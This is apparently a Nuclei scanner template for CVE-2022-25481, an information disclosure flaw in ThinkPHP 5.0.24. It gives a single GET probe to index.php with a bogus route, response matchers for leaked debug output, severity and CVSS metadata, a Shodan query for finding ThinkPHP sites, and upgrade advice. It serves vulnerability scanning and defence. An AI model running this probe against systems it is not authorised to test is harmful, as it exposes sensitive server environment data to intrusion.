nuclei-templates/http/cves/2022/CVE-2022-25481.yaml

53 lines
1.7 KiB
YAML

id: CVE-2022-25481
info:
name: ThinkPHP 5.0.24 - Information Disclosure
author: caon
severity: high
description: |
ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
remediation: |
Upgrade to a patched version of ThinkPHP or apply the necessary security patches.
reference:
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25481
cwe-id: CWE-668
epss-score: 0.01311
epss-percentile: 0.84406
cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: thinkphp
product: thinkphp
shodan-query: title:"ThinkPHP"
tags: cve,cve2022,thinkphp,exposure,oss
http:
- method: GET
path:
- '{{BaseURL}}/index.php?s=example'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Exception"
- "REQUEST_TIME"
- "ThinkPHP Constants"
condition: and
- type: status
status:
- 200
- 500
- 404
condition: or
# digest: 4a0a0047304502203c5a7f4c72bb5651ab8b6ed1ec6f3ea140ac78497e3eb9bb39255b3408d4d194022100d2b2bb7c9f06b44b05c5629172b2dadf35b894dbd23ce8d257d1b59bddd8ab1e:922c64590222798bb761d5b6d8e72950